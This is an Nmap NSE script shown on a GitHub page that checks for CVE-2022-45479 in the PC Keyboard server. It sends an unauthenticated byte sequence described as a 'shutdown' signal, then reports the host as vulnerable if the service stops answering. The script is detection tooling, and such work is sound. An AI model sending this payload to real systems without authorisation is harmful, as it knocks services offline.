-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathPCKeyboard_check_script.nse
125 lines (107 loc) · 4.04 KB
/
PCKeyboard_check_script.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
---
-- https://shellcode.blog/services
---
--Usage:
--nmap -script PCKeyboard_check_script.nse -sT -p 7007 <host>
--Output Example:
-- PORT STATE SERVICE REASON
-- 7007/tcp open PCKeyboard syn-ack
-- | PCKeyboard_check_script:
-- | VULNERABLE:
-- | PCKeyboard Remote Code Execution
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2022-45479
-- | Risk factor: High CVSSv3: 9.8 (HIGH) (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
-- | PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code.
-- |
-- | Disclosure date: 2022-11-30
-- | References:
-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45479
-- Load required Nmap modules
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
PCKeyboard CVE-2022-45479 is a Remote Code Execution vulnerability.
This script looks the existence of CVE-2022-45479 based on the server's availability after sending a "shutdown" single.
]]
author = "Mohammed Alshehri"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive","auth", "vuln"}
-- Function to set the port state and version
function set_nmap(host, port)
port.state = "open"
port.version.name = "PCKeyboard"
port.version.product = "30"
nmap.set_port_version(host, port)
nmap.set_port_state(host, port, "open")
end
-- Rule to detect open port 7007 with the service name "PCKeyboard"
portrule = shortport.port_or_service(7007, "PCKeyboard", "tcp")
-- Define a function named action with two parameters host and port
action = function(host,port)
-- Define a detection code
-- Shutdown signal
local detection_code = string.char(0x23, 0x4a, 0x23,0x4b, 0x32, 0x3a, 0x30, 0x31)
-- Define the vulnerability report for CVE-2022-45479
local vuln_45479 = {
title = "PCKeyboard Remote Code Execution",
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
scores = {
CVSSv3 = "9.8 (HIGH) (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)",
},
description = [[
PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code.
]],
IDS = {CVE = "CVE-2022-45479"},
references = {
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45479' },
dates = { disclosure = { year = '2022', month = '11', day = '30' } }
}
-- Create a new vulnerability report object
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
-- Create a new TCP socket object
local sock = nmap.new_socket("tcp")
sock:set_timeout(1000)
-- Try to establish a TCP connection with the target host and port
local constatus,conerr = sock:connect(host, port,"tcp")
if not constatus then
-- If the connection fails, print an error message
stdnse.debug1(
'Error establishing a TCP connection for %s - %s', host, conerr
)
return nil
end
-- Try to send the detection code to the target
local status, senderr = sock:send(detection_code)
if(status == false) then
-- If the sending fails, print an error message
stdnse.debug1(
'Error sending a TCP message for %s - %s', host, conerr
)
stdnse.debug1(senderr)
return "Error: 2"
end
-- Close the TCP socket
sock:close()
-- Wait for 8 seconds
stdnse.debug1("------------------------------------ Waiting ------------------------------------")
stdnse.sleep(8)
-- Try to establish a new TCP connection with the target host and port
local constatus, conerr = sock:connect(host, port,"tcp")
if not constatus then
-- If the connection fails, mark the target as vulnerable and print a message
stdnse.debug1(
'Error establishing a TCP connection for %s - %s', host, conerr
)
vuln_45479.state = vulns.STATE.VULN
set_nmap(host, port)
return vuln_report:make_output (vuln_45479)
end
-- If the connection succeeds, print a message
stdnse.debug1("Good news! The server is still connectable : )")
return nil
end